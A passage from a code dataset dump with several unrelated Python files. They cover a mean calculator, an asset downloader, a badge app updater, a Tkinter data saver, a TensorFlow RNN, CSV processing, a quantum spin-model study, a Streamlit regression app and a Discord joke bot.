int(input(\"please enter amount of numbers wanted\"))\nvalue = sum(float(input(\"please enter your number:\"))for count in range(amount))\nmean = (value + added) / amount \nprint(mean) \n\n\n","sub_path":"Iteration_Revision_Exercises_Task5.py","file_name":"Iteration_Revision_Exercises_Task5.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"90991757","text":"#coding=utf-8\n\nimport os,requests\n\ndef downloadRes(serverUrl,filename):\n cur_file_path = os.path.abspath('.')\n #print cur_file_path\n save_file_name = os.path.join(cur_file_path,filename)\n #判断文件路径是否存在\n dirname = os.path.dirname(save_file_name)\n dirname=dirname.replace('/','\\\\')\n if os.path.exists(dirname):\n pass\n else:\n os.makedirs(dirname)\n url = serverUrl + filename;\n try:\n # Solution 1\n # f = urllib2.urlopen(url)\n # data = f.read()\n # with open(filename,'wb') as code:\n # code.write(data)\n # code.close()\n\n # Solution 2\n print('Begin downloading ' + filename)\n r = requests.get(url)\n with open(filename,'wb') as code:\n code.write(r.content)\n code.close()\n print('Done!')\n except Exception as e:\n print(e)\n print(url)\n \nif __name__ == '__main__':\n fileobj = open('res.txt')\n all_lines = fileobj.readlines()\n for line in all_lines:\n line =line.strip()\n serverurl = \"http://softgames.cn/games/bubble-shooter/\"\n downloadRes(serverurl,line)\n fileobj.close()","sub_path":"platforms/android/assets/www/dw.py","file_name":"dw.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"425050951","text":"import ugfx, woezel, easywifi, easydraw, appglue, time, os\n\ndef stop():\n time.sleep(2)\n appglue.start_app(\"launcher\")\n\neasydraw.msg(\"Welcome!\",\"Still updating anyway...\",True)\n\n\nif not easywifi.status():\n if not easywifi.enable():\n stop()\n\ntry:\n apps = os.listdir('lib')\nexcept OSError:\n easydraw.msg(\"There are no apps installed.\")\n stop()\n\nfor app in apps:\n easydraw.msg(\"Updating '\"+app+\"'...\")\n try:\n woezel.install(app)\n easydraw.msg(\"Done!\")\n except:\n print(\"failed update. Already newest version?\")\n\neasydraw.msg(\"All your apps are now up-to-date!\")\nstop()\n","sub_path":"esp32/modules_sha2017/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"546472118","text":"\"\"\"\n\n\nScrumPy -- Metabolic Modelling with Python\n\nCopyright Mark Poolman 1995 - 2002\n\n This file is part of ScrumPy.\n\n ScrumPy is free software; you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation; either version 2 of the License, or\n (at your option) any later version.\n\n ScrumPy is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with ScrumPy; if not, write to the Free Software\n Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n\n\"\"\"\nimport Tkinter\n\n#from ScrumPy.ThirdParty.Pmw\nimport Pmw\n\nimport TextSelect\nimport FileDialogs\n\ndef ignore(*args, **kwargs):\n pass\n\nclass Saver(Tkinter.Toplevel):\n def __init__(self, Model, **kwargs):\n\n self.model = Model\n try:\n self.name = Model.ModelName\n except:\n self.name = \"un-named data\"\n self.TheData = {} # make a dict here in case user tries to update before self.OK()\n Tkinter.Toplevel.__init__(self)\n self.group = Pmw.Group(self)\n\n self.typesel = Pmw.RadioSelect(\n self.group.interior(),\n command=self.RadioClick,\n #label_text = 'Update policy',\n buttontype=\"radiobutton\",\n orient=\"vertical\"\n )\n self.typesel.add(\"Static\")\n self.typesel.add(\"Dynamic\")\n\n self.datsel = TextSelect.TextSelector(self.group.interior(), self.model.keys(), ignore)\n self.datsel._listbox[\"selectmode\"] = \"extended\"\n\n self.ok = Tkinter.Button(self, text=\"OK\", command=self.OK)\n self.group.pack(expand=1, fill=\"both\")\n\n self.typesel.pack(side = \"left\", expand=1, fill=\"both\")\n self.datsel.pack(side = \"right\", expand=1, fill=\"both\")\n self.ok.pack(side=\"bottom\", fill=\"both\")\n\n\n def RadioClick(self,arg):\n\n if arg == \"Static\":\n self.MakeStatic()\n else:\n self.MakeDynamic()\n\n def MakeStatic(self):\n self.model.Unregister(self)\n self.model.AddStatMonitor(self)\n\n def MakeDynamic(self):\n self.model.Unregister(self)\n self.model.AddDynMonitor(self)\n\n def OK(self):\n self.datanames = self.datsel.Selected() # what the user has selected\n self.TheData = self.model.NewDataSet(self.datanames) # where the data will be stored\n self.fname = FileDialogs.SaveFileName() # file name to which data will finally go\n self.typesel.destroy() # user has selected, can't change mind\n self.ok.destroy() # you can only say \"OK\" once\n self.datsel.setlist(self.datanames) # so that the user can see what they selected\n self.Running = Tkinter.Label(self, text=\"Saver for \" + self.name + \"\\n(will update automatically)\" )\n self.Running.pack() # leave a window open to remind them they have an active saver\n\n\n def destroy(self):\n self.model.Unregister(self)\n self.SaveOrLoose()\n\n def SaveOrLoose(self):\n try:\n self.Running.destroy()\n msg = Tkinter.Label(\n self,\n text=\"Saver for \" + self.name +\n \"\\nModel has changed or window closed:\\n save or loose current data ?\")\n msg.pack()\n Tkinter.Button(self, text=\"Save\", command=self.finalSave).pack()\n Tkinter.Button(self, text=\"Loose\", command=self.tkdestroy).pack()\n except:\n self.tkdestroy() # if the user destroys before hitting \"OK\"\n\n def Save(self):\n self.TheData.WriteFile(self.fname)\n\n\n def tkdestroy(self):\n Tkinter.Toplevel.destroy(self)\n\n\n\n def finalSave(self):\n self.Save()\n self.tkdestroy()\n\n\n def Update(self):\n self.TheData.Update()\n #self.model.UpdateDataSet(self.TheData)\n\n\n","sub_path":"models/poolman/ScrumPy549/ScrumPy/tkGUI/Saver.py","file_name":"Saver.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"541039122","text":"import tensorflow as tf\nfrom tensorflow.contrib import rnn\nimport numpy as np\n\nCLASS_1 = 1 # next is space\nCLASS_0 = 0 # next is not space\nclass_size = 2\n\n# \"hi, hello\"\n# {' ': 0, ',': 1, 'e': 2, 'h': 3, 'i': 4, 'l': 5, 'o': 6}\n# ,:[0,1,0,0,0,0,0] e:[0,0,1,0,0,0,0], h:[0,0,0,1,0,0,0], i:[0,0,0,0,1,0,0], l:[0,0,0,0,0,1,0], o:[0,0,0,0,0,0,1]\nx_data = [\n [ [0, 0, 0, 1, 0, 0, 0], # h\n [0, 0, 0, 0, 1, 0, 0], # i\n [0, 1, 0, 0, 0, 0, 0], # ,\n [0, 0, 0, 1, 0, 0, 0], # h\n [0, 0, 1, 0, 0, 0, 0], # e\n [0, 0, 0, 0, 0, 1, 0], # l\n [0, 0, 0, 0, 0, 1, 0], # l\n [0, 0, 0, 0, 0, 0, 1] ] # o\n ]\ny_data = [[0, 0, 1, 0, 0, 0, 0, 1]]\n\nbatch_x = np.array(x_data, dtype='f')\nbatch_y = np.array(y_data, dtype='int32')\n\n\n# Parameters\nlearning_rate = 0.001\ntraining_iters = 500\ndisplay_step = 100\n\n# Network Parameters\nbatch_size = 1\nsequence_size = 8 # timesteps\nvector_size = 7 # vocaburary size\nhidden_size1 = 256 # hidden layer num of features\nhidden_size2 = 64 # hidden layer num of features\nhidden_size3 = 16 # hidden layer num of features\ndrop_out_rate = 0.7\n\n# tf Graph input\nx = tf.placeholder(\"float\", [None, sequence_size, vector_size])\ny = tf.placeholder(\"int32\", [None, sequence_size])\n\nweights = {\n 'out1': tf.get_variable(\"out1\", shape=[2 * hidden_size1, hidden_size2], initializer=tf.contrib.layers.xavier_initializer()),\n 'out2': tf.get_variable(\"out2\", shape=[hidden_size2, hidden_size3], initializer=tf.contrib.layers.xavier_initializer()),\n 'out3': tf.get_variable(\"out3\", shape=[hidden_size3, class_size], initializer=tf.contrib.layers.xavier_initializer())\n}\nbiases = {\n 'out1': tf.Variable(tf.constant(0.1, shape=[hidden_size2]), name=\"bias_out1\"),\n 'out2': tf.Variable(tf.constant(0.1, shape=[hidden_size3]), name=\"bias_out2\"),\n 'out3': tf.Variable(tf.constant(0.1, shape=[class_size]), name=\"bias_out3\")\n}\n\ndef BidirectionalRNN(X, weights, biases):\n X = tf.unstack(X, sequence_size, axis=1)\n\n fw_cell = rnn.GRUCell(hidden_size1)\n bw_cell = rnn.GRUCell(hidden_size1)\n\n outputs, state_fw, state_bw = rnn.static_bidirectional_rnn(fw_cell, bw_cell, X, dtype=tf.float32)\n\n final_outputs = []\n for output in outputs:\n hidden1 = tf.nn.relu( tf.matmul( output, weights['out1']) + biases['out1'] )\n hidden1_1 = tf.nn.dropout(hidden1, drop_out_rate)\n hidden2 = tf.nn.relu( tf.matmul( hidden1_1, weights['out2']) + biases['out2'] )\n hidden2_1 = tf.nn.dropout(hidden2, drop_out_rate)\n out = tf.nn.relu( tf.matmul(hidden2_1, weights['out3']) + biases['out3'] )\n final_outputs.append(out)\n return final_outputs\n\ny_ = BidirectionalRNN(x, weights, biases)\nlogits = tf.reshape(tf.concat(y_, 1), [-1, class_size], name=\"logits\")\ntargets = tf.reshape(y, [1, -1], name=\"targets\")\n\nseq_weights = tf.ones([batch_size * sequence_size])\nloss = tf.contrib.legacy_seq2seq.sequence_loss_by_example([logits], [targets], [seq_weights])\n\ncost = tf.reduce_sum(loss) / batch_size\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate, name=\"optimizer\").minimize(cost)\n\n\n\nNUM_THREADS = 1\nsess = tf.Session(config=tf.ConfigProto(intra_op_parallelism_threads=NUM_THREADS,inter_op_parallelism_threads=NUM_THREADS,log_device_placement=False))\ninit = tf.global_variables_initializer()\nsess.run(init)\n\nstep = 0\nwhile step < training_iters :\n feed={x: batch_x, y: batch_y}\n sess.run(optimizer, feed_dict=feed)\n\n if step % display_step == 0 :\n p_x, p_y, p_y_, p_logits, p_cost = sess.run([x, y, y_, logits, cost], feed_dict=feed)\n print ('step : %s' % step + ',' + 'cost : %s' % p_cost)\n\n step += 1\n\n\n# inference\ntest_sentences = ['hi,hello']\n\ni = 0\nwhile i < len(test_sentences) :\n sentence = test_sentences[i]\n length = len(sentence)\n diff = sequence_size - length\n if diff > 0 : # add padding\n test_sentences[i] += ' '*diff\n i += 1\n\nbatch_size = len(test_sentences)\n\nfeed={x: batch_x, y: batch_y}\ny_, logits, result = sess.run([y_, logits, tf.arg_max(logits, 1)], feed_dict=feed)\n\ni = 0\nwhile i < len(test_sentences) :\n sentence = test_sentences[i]\n bidx = i * sequence_size\n eidx = bidx + sequence_size\n rst = result[bidx:eidx]\n\n out = []\n j = 0\n while j < sequence_size :\n tag = rst[j]\n if tag == CLASS_1 :\n out.append(sentence[j])\n out.append(' ')\n else :\n out.append(sentence[j])\n j += 1\n n_sentence = ''.join(out).strip()\n print ('out = ' + n_sentence)\n i += 1\nsess.close()","sub_path":"a_BasicModels/bidirectional_rnn.py","file_name":"bidirectional_rnn.py","file_ext":"py","file_size_in_byte":4605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"349313500","text":"#!/usr/bin/env python\n#coding: UTF-8\nimport csv\n\n# = open('pzd.txt', 'r')\n#dataReader = csv.reader(f)\n\n#for line in dataReader:\n#\tprint line\n#for line in open('pzd.txt', 'r'):\n#\telement = line.split(\",\")\n#\tprint element[3]\n#f.close()\n\n#ファイルの読み込み\nf=open('pwz.txt')\nline=f.readline()\n\n#csvファイルに出力\nnew = open('pwz.csv', 'ab')\ncsvWriter = csv.writer(new)\n\n\nwhile line:\n\telement = line.split(',')\n\treturnDur = [0]*24 #通勤時間\n\tminReturnTime = [0]*19 #帰宅時間\n\tatOfficeDur = [0]*12 #会社滞在時間\n\ti = 0\n\ta = 0\n\tb = 0\n\tc = 0\n\tlistData = []\n\t#print line\n\twhile i < 54:\n\t\tif i < 23:\n\t\t\treturnDur[a] = element[i]\n\t\t\ta += 1\n\t\telif i >= 23 and i <= 41:\n\t\t\tminReturnTime[b] = element[i]\n\t\t\tb += 1\n\t\telse:\n\t\t\tatOfficeDur[c] = element[i]\n\t\t\tc += 1\n\t\ti += 1\n\tlistData.append(returnDur.index(max(returnDur)) + 1)\n\tlistData.append(minReturnTime.index(max(minReturnTime)) + 1)\n\tlistData.append(atOfficeDur.index(max(atOfficeDur)) + 1)\n\tlistData.append(int(element[54]))\n\tcsvWriter.writerow(listData) #1行書き込み\n\n\tline = f.readline()\nf.close\n","sub_path":"human/bayes.py","file_name":"bayes.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"500730199","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import division\nimport math\nimport numpy as np\nimport scipy as sp\nimport pandas\nimport matplotlib.pyplot as plt\nfrom progressbar import ProgressBar\nfrom scipy.sparse import linalg as sparse_linalg\nfrom copy import deepcopy\n\nfrom Hamiltonian_Classes import Hamiltonian,H_table,clock_Hamiltonian,spin_Hamiltonian,H_operations\nfrom System_Classes import unlocking_System,U1_system\nfrom Symmetry_Classes import translational,parity,model_sym_data,charge_conjugation,translational_general,PT\n# from Plotting_Classes import eig_overlap,fidelity,entropy,energy_basis\nfrom Construction_functions import bin_to_int_base_m,int_to_bin_base_m,cycle_bits_state\nfrom Search_functions import find_index_bisection\nfrom State_Classes import zm_state,sym_state,prod_state,bin_state,ref_state\nfrom rw_functions import save_obj,load_obj\nfrom Calculations import level_stats,fidelity,eig_overlap,entropy,site_precession,site_projection,time_evolve_state,get_top_band_indices\n\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Computer Modern'],'size':26})\n## for Palatino and other serif fonts use:\n#rc('font',**{'family':'serif','serif':['Palatino']})\nrc('text', usetex=True)\n# matplotlib.rcParams['figure.dpi'] = 400\ndef com(a,b):\n return np.dot(a,b)-np.dot(b,a)\ndef exp(Q,psi):\n return np.vdot(psi,np.dot(Q,psi))\ndef var(Q,psi):\n Q2 = np.dot(Q,Q)\n return exp(Q2,psi)-exp(Q,psi)**2\n\n#init system\nN=20\npxp = unlocking_System([0],\"periodic\",2,N)\npxp.gen_basis()\npxp_syms = model_sym_data(pxp,[translational_general(pxp,order=2),PT(pxp)])\n\nHp = dict()\nHp[0] = Hamiltonian(pxp,pxp_syms)\nHp[0].site_ops[1] = np.array([[0,0],[1,0]])\nHp[0].site_ops[2] = np.array([[0,1],[0,0]])\nHp[0].model = np.array([[0,1,0],[0,2,0]])\nHp[0].model_coef = np.array([1,1])\nHp[0].uc_size = np.array([2,2])\nHp[0].uc_pos = np.array([1,0])\n\nHp[1] = Hamiltonian(pxp,pxp_syms)\nHp[1].site_ops[1] = np.array([[0,0],[1,0]])\nHp[1].site_ops[2] = np.array([[0,1],[0,0]])\nHp[1].model = np.array([[0,0,1,0],[0,1,0,0],[0,0,2,0],[0,2,0,0]])\nHp[1].model_coef = np.array([1,1,1,1])\nHp[1].uc_size = np.array([2,2,2,2])\nHp[1].uc_pos = np.array([0,1,1,0])\n\n#2nd order perts\nHp[2] = Hamiltonian(pxp,pxp_syms)\nHp[2].site_ops[1] = np.array([[0,0],[1,0]])\nHp[2].site_ops[2] = np.array([[0,1],[0,0]])\nHp[2].site_ops[3] = np.array([[-1/2,0],[0,1/2]])\nHp[2].model = np.array([[0,3,0,1,0],[0,1,0,3,0],[0,3,0,2,0],[0,2,0,3,0]])\nHp[2].model_coef = np.array([1,1,1,1])\nHp[2].uc_size = np.array([2,2,2,2])\nHp[2].uc_pos = np.array([1,1,0,0])\n\nHp[3] = Hamiltonian(pxp,pxp_syms)\nHp[3].site_ops[1] = np.array([[0,0],[1,0]])\nHp[3].site_ops[2] = np.array([[0,1],[0,0]])\nHp[3].site_ops[3] = np.array([[-1/2,0],[0,1/2]])\nHp[3].model = np.array([[0,1,0,0,0],[0,0,0,1,0],[0,2,0,0,0],[0,0,0,2,0]])\nHp[3].model_coef = np.array([1,1,1,1])\nHp[3].uc_size = np.array([2,2,2,2])\nHp[3].uc_pos = np.array([1,1,0,0])\n\nHp[4] = Hamiltonian(pxp,pxp_syms)\nHp[4].site_ops[1] = np.array([[0,0],[1,0]])\nHp[4].site_ops[2] = np.array([[0,1],[0,0]])\nHp[4].site_ops[3] = np.array([[-1/2,0],[0,1/2]])\nHp[4].model = np.array([[0,0,1,0,0],[0,0,2,0,0]])\nHp[4].model_coef = np.array([1,1])\nHp[4].uc_size = np.array([2,2])\nHp[4].uc_pos = np.array([0,1])\n\nHp[5] = Hamiltonian(pxp,pxp_syms)\nHp[5].site_ops[1] = np.array([[0,0],[1,0]])\nHp[5].site_ops[2] = np.array([[0,1],[0,0]])\nHp[5].site_ops[3] = np.array([[-1/2,0],[0,1/2]])\nHp[5].model = np.array([[0,0,1,0,3,0],[0,3,0,1,0,0],[0,0,2,0,3,0],[0,3,0,2,0,0]])\nHp[5].model_coef = np.array([1,1,1,1])\nHp[5].uc_size = np.array([2,2,2,2])\nHp[5].uc_pos = np.array([0,1,1,0])\n\nHp[6] = Hamiltonian(pxp,pxp_syms)\nHp[6].site_ops[1] = np.array([[0,0],[1,0]])\nHp[6].site_ops[2] = np.array([[0,1],[0,0]])\nHp[6].site_ops[3] = np.array([[-1/2,0],[0,1/2]])\nHp[6].model = np.array([[0,0,0,1,0,0],[0,0,1,0,0,0],[0,0,0,2,0,0],[0,0,2,0,0,0]])\nHp[6].model_coef = np.array([1,1,1,1])\nHp[6].uc_size = np.array([2,2,2,2])\nHp[6].uc_pos = np.array([1,0,0,1])\n\nHp[7] = Hamiltonian(pxp,pxp_syms)\nHp[7].site_ops[1] = np.array([[0,0],[1,0]])\nHp[7].site_ops[2] = np.array([[0,1],[0,0]])\nHp[7].site_ops[3] = np.array([[-1/2,0],[0,1/2]])\nHp[7].model = np.array([[0,1,0,3,0,0],[0,0,3,0,1,0],[0,0,3,0,2,0],[0,2,0,3,0,0]])\nHp[7].model_coef = np.array([1,1,1,1])\nHp[7].uc_size = np.array([2,2,2,2])\nHp[7].uc_pos = np.array([1,0,1,0])\n\nHp[8] = Hamiltonian(pxp,pxp_syms)\nHp[8].site_ops[1] = np.array([[0,0],[1,0]])\nHp[8].site_ops[2] = np.array([[0,1],[0,0]])\nHp[8].site_ops[3] = np.array([[-1/2,0],[0,1/2]])\nHp[8].model = np.array([[0,0,0,0,1,0],[0,1,0,0,0,0],[0,0,0,0,2,0],[0,2,0,0,0,0]])\nHp[8].model_coef = np.array([1,1,1,1])\nHp[8].uc_size = np.array([2,2,2,2])\nHp[8].uc_pos = np.array([0,1,1,0])\n\nHp[9] = Hamiltonian(pxp,pxp_syms)\nHp[9].site_ops[1] = np.array([[0,0],[1,0]])\nHp[9].site_ops[2] = np.array([[0,1],[0,0]])\nHp[9].site_ops[3] = np.array([[-1/2,0],[0,1/2]])\nHp[9].model = np.array([[0,0,1,0,3,0,0],[0,0,3,0,1,0,0],[0,0,2,0,3,0,0],[0,0,3,0,2,0,0]])\nHp[9].model_coef = np.array([1,1,1,1])\nHp[9].uc_size = np.array([2,2,2,2])\nHp[9].uc_pos = np.array([0,0,1,1])\n\nz=zm_state(2,1,pxp)\nk=pxp_syms.find_k_ref(z.ref)\nfor n in range(0,len(Hp)):\n # Hp[n].gen()\n for m in range(0,np.size(k,axis=0)):\n Hp[n].gen(k[m])\n\n# coef = np.zeros(9)\ncoef = np.load(\"../../../../pxp,2nd_order_perts/z2/data/all_terms/18/18_all_terms/pxp,z2,2nd_order_perts,fid_coef,18.npy\")\n# coef[0] = 0.108\nHp_total = deepcopy(Hp[0])\nfor n in range(1,len(Hp)):\n Hp_total = H_operations.add(Hp_total,Hp[n],np.array([1,coef[n-1]]))\nHm = Hp_total.herm_conj()\n\nH = H_operations.add(Hp_total,Hm,np.array([1,1]))\nz=zm_state(2,1,pxp,1)\nfsa_dim = pxp.N\nfrom Calculations import gen_fsa_basis\nfsa_basis = gen_fsa_basis(Hp_total.sector.matrix(k[0]),z.sym_basis(k[0],pxp_syms),fsa_dim)\nH_fsa = np.dot(np.conj(np.transpose(fsa_basis)),np.dot(H.sector.matrix(k[0]),fsa_basis))\n\nH.sector.find_eig(k[0])\nexact_overlap = eig_overlap(z,H,k[0]).eval()\nexact_energy = H.sector.eigvalues(k[0])\n\ne,u = np.linalg.eigh(H_fsa)\nfsa_overlap = np.log10(np.abs(u[0,:])**2)\nfsa_energy = e\n\nplt.scatter(exact_energy,exact_overlap)\nplt.scatter(fsa_energy,fsa_overlap,marker=\"x\",color=\"red\",s=100)\nplt.show()\n\nt=np.arange(0,20,0.01)\nf=fidelity(z,H,\"use sym\").eval(t,z)\nplt.plot(t,f)\nplt.show()\n\n#identify scar states for entropy highlight\nscar_indices = get_top_band_indices(exact_energy,exact_overlap,pxp.N,100,100,e_diff = 0.5)\n#check identified right states\nplt.scatter(exact_energy,exact_overlap)\nfor n in range(0,np.size(scar_indices,axis=0)):\n plt.scatter(exact_energy[scar_indices[n]],exact_overlap[scar_indices[n]],marker=\"D\",color=\"green\",alpha=0.5,s=100)\nplt.show()\n\nU = pxp_syms.basis_transformation(k[0])\neigvectors_comp = np.dot(U,H.sector.eigvectors(k[0]))\nfsa_eigs_comp = np.dot(U,np.dot(fsa_basis,u))\n\n#entropy\nent_vals = np.zeros(np.size(eigvectors_comp,axis=1))\nent = entropy(pxp)\npbar=ProgressBar()\nfor n in pbar(range(0,np.size(ent_vals,axis=0))):\n ent_vals[n] = ent.eval(eigvectors_comp[:,n])\n\nent_fsa = np.zeros(np.size(e))\nfor n in range(0,np.size(ent_fsa,axis=0)):\n ent_fsa[n] = ent.eval(fsa_eigs_comp[:,n])\n\nplt.scatter(exact_energy,ent_vals)\nscar_entropy = np.zeros(np.size(scar_indices))\nscar_energy = np.zeros(np.size(scar_indices))\nfor n in range(0,np.size(scar_indices,axis=0)):\n scar_entropy[n] = ent_vals[scar_indices[n]]\n scar_energy[n] = exact_energy[scar_indices[n]]\nplt.scatter(scar_energy,scar_entropy,marker=\"D\",color=\"orange\",alpha=0.4,s=200,label=\"ED Scars\")\nplt.scatter(e,ent_fsa,marker=\"x\",color=\"red\",s=200,label=r\"$su(2)$ Ritz vectors\")\nplt.legend()\nplt.xlabel(r\"$E$\")\nplt.ylabel(r\"$S$\")\nplt.show()\n\n# np.save(\"pxp,0th_order,e,\"+str(pxp.N),exact_energy)\n# np.save(\"pxp,0th_order,z2_overlap,\"+str(pxp.N),exact_overlap)\n# np.save(\"pxp,0th_order,z2_fidelity,\"+str(pxp.N),f)\n# np.save(\"pxp,z2_fsa,0th_order,e,\"+str(pxp.N),fsa_energy)\n# np.save(\"pxp,z2_fsa,0th_order,z2_overlap,\"+str(pxp.N),fsa_overlap)\n\n# np.save(\"pxp,1st_order,e,\"+str(pxp.N),exact_energy)\n# np.save(\"pxp,1st_order,z2_overlap,\"+str(pxp.N),exact_overlap)\n# np.save(\"pxp,1st_order,z2_fidelity,\"+str(pxp.N),f)\n# np.save(\"pxp,z2_fsa,1st_order,e,\"+str(pxp.N),fsa_energy)\n# np.save(\"pxp,z2_fsa,1st_order,z2_overlap,\"+str(pxp.N),fsa_overlap)\n\n# np.save(\"pxp,2nd_order,e,\"+str(pxp.N),exact_energy)\n# np.save(\"pxp,2nd_order,z2_overlap,\"+str(pxp.N),exact_overlap)\n# np.save(\"pxp,2nd_order,z2_fidelity,\"+str(pxp.N),f)\n# np.save(\"pxp,z2_fsa,2nd_order,e,\"+str(pxp.N),fsa_energy)\n# np.save(\"pxp,z2_fsa,2nd_order,z2_overlap,\"+str(pxp.N),fsa_overlap)\n","sub_path":"projects/broken_su2_general_models/error_metric_plots/dynamic_summary/z2/pxp,z2_errors.py","file_name":"pxp,z2_errors.py","file_ext":"py","file_size_in_byte":8514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"103664126","text":"#import package\nimport streamlit as st\nimport pandas as pd\nimport numpy as np\nfrom PIL import Image\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error, r2_score\nfrom math import sqrt\nimport time\nimport matplotlib.pyplot as plt\n\n#import the data\ndata = pd.read_csv(\"salarios.csv\")\nst.title(\"Predicción salario \")\nst.markdown(\"**Guarda las imagenes en la carpeta assets como png**\")\n#checking the data\nst.write(\"Esta es una aplicación para averiguar qué rango de salario elige usando el aprendizaje automático.\")\ncheck_data = st.checkbox(\"Visualizar el dataset\")\nif check_data:\n st.write(data.head(2))\n st.write(data.describe())\nst.write(\"Se calcula el salario cambiando la experiencia.\")\n\nplot= st.sidebar.checkbox(\"Mostrar Plot Scatter Train y Test\", False)\n\n\n#input the numbers\n\nexperience = st.slider(\"Experience\",int(data.Experiencia.min()),int(data.Experiencia.max()) )\n#experience = st.slider(\"Experience\",int(data.Experiencia.min()),int(data.Experiencia.max()),int(data.Experiencia.mean()) )\n\n#splitting your data\nX = data.drop('Salario', axis = 1)\ny = data['Salario']\nX_train, X_test, y_train, y_test = train_test_split(X,y,test_size=.2, random_state=45)\n\n\n#modelling\n#import your model\nmodel=LinearRegression()\n#fitting and predict your model\nmodel.fit(X_train, y_train)\nmodel.predict(X_test)\nerrors = np.sqrt(mean_squared_error(y_test,model.predict(X_test)))\npredictions = model.predict([[experience]])[0]\n\n\n\nif plot:\n st.write(\"scatter Datos de Train\")\n fig, ax = plt.subplots()\n ax.scatter(X_train, y_train, color='purple')\n ax.plot(X_train, model.predict(X_train), color='orange')\n plt.title('Salario vs Experiencia')\n plt.xlabel('Experiencia') # creamos nuevos datos adicionales\n plt.ylabel('Salario')\n fig.savefig('/Users/sandrarairan/Documents/desarrollo/streamlit/linearRegression/assets/scatter_train.png')\n st.pyplot(fig)\n \n\nif plot:\n st.write(\"scatter Datos de Test\")\n fig, ax = plt.subplots()\n ax.scatter(X_test, y_test, color='green')\n ax.plot(X_train, model.predict(X_train), color='red')\n plt.title('Salario vs Experiencia')\n plt.xlabel('Experiencia') # creamos nuevos datos adicionales\n plt.ylabel('Salario')\n #fig.write_image('scatter_test.png')\n fig.savefig('/Users/sandrarairan/Documents/desarrollo/streamlit/linearRegression/assets/scatter_test.png')\n st.pyplot(fig) \n \n\n#checking prediction house price\nif st.button(\"Predecir!\"):\n st.header(\"EL salario predicción es: {}\".format(int(predictions)))\n st.subheader(\"rango predicción: es COL {} - COL {}\".format(int(predictions-errors),int(predictions+errors) ))\n\n st.write(\"score\",model.score(X_test, y_test))\n\n mse_list=[]\n rmse_list=[]\n r2_list=[]\n\n mse = mean_squared_error(y_test,model.predict(X_test))\n rmse = sqrt(mse)\n r2=r2_score(y_test,model.predict(X_test))\n mse_list.append(mse)\n rmse_list.append(rmse)\n r2_list.append(r2)\n\n res=pd.DataFrame(columns=[\"MSE\",\"RMSE\",\"r2_SCORE\"])\n st.write(\"MSE: el error cuadrático medio de un estimador mide el promedio de los errores al cuadrado, es decir, la diferencia entre el estimador y lo que se estima\")\n\n res[\"MSE\"]=mse_list\n ##RMSE es una medida de la dispersión de estos residuos. En otras palabras, le dice qué tan concentrados están los datos alrededor de la línea de mejor ajuste.\n st.write(\"RMSE es una medida de la dispersión de estos residuos. En otras palabras, le dice qué tan concentrados están los datos alrededor de la línea de mejor ajuste.\")\n \n \n res[\"RMSE\"]=rmse_list\n res[\"r2_SCORE\"]=r2_list\n\n st.write(res)\n \n\n ","sub_path":"linearregression.py","file_name":"linearregression.py","file_ext":"py","file_size_in_byte":3691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"611841250","text":"# Import discord package\nimport discord\nfrom discord.ext import commands\nimport random\n\n# The bot\nbot = commands.Bot(command_prefix = '8! ', case_insensitive = True)\ngenChannel = 852997471314509884\n\n# when the bot starts\n@bot.event\nasync def on_ready(): # async allows the function to run even though there is a delay\n general_channel = bot.get_channel(genChannel)\n\n await general_channel.send('Hello, I am What-If Bot. I am an absolute meme. write \"8! commands\" to get started')\n\n# help\n@bot.command(name = 'commands')\nasync def commands(context):\n infoEmbed = discord.Embed(title = \"List of Functions\", color = 0xA977F1)\n infoEmbed.add_field(name = \"what if ...\", value = \"answers your what if question\", inline = False)\n infoEmbed.add_field(name = \"8! joke\", value = \"gives a funny dad joke\", inline = False)\n infoEmbed.add_field(name = \"8! version\", value = \"states the version\", inline = False)\n infoEmbed.set_footer(text = \"Ann B and Huy M\")\n\n await context.message.channel.send(embed = infoEmbed)\n\n# version\n@bot.command(name = 'version')\nasync def version(context):\n verEmbed = discord.Embed(title = \"Current Version:\", color = 0xA977F1)\n verEmbed.add_field(name = \"Version Code\", value = \"v1.0.2\", inline = False)\n verEmbed.add_field(name = \"Release Date\", value = \"June 12, 2021\", inline = False)\n verEmbed.set_author(name = \"What-If Bot\")\n verEmbed.set_footer(text = \"Ann B and Huy M\")\n\n await context.message.channel.send(embed = verEmbed)\n\n# jokes\n@bot.command(name = 'joke')\nasync def joke(context):\n \n file = open('dadjokes.txt')\n content = file.readlines()\n r1 = random.randint(0,len(content) - 1)\n\n await context.message.channel.send(content[r1])\n\n# what if\n@bot.event\nasync def on_message(message):\n if \"what if\" in message.content.lower():\n file = open('what-ifs.txt')\n content = file.readlines()\n r2 = random.randint(0,len(content) - 1)\n\n await message.channel.send(content[r2])\n\n await bot.process_commands(message)\n\n# When the bot disconnects from the server\n@bot.event\nasync def on_disconnect():\n general_channel = bot.get_channel(genChannel)\n await general_channel.send('Goodbye, and have a nice day!')\n\n\n# 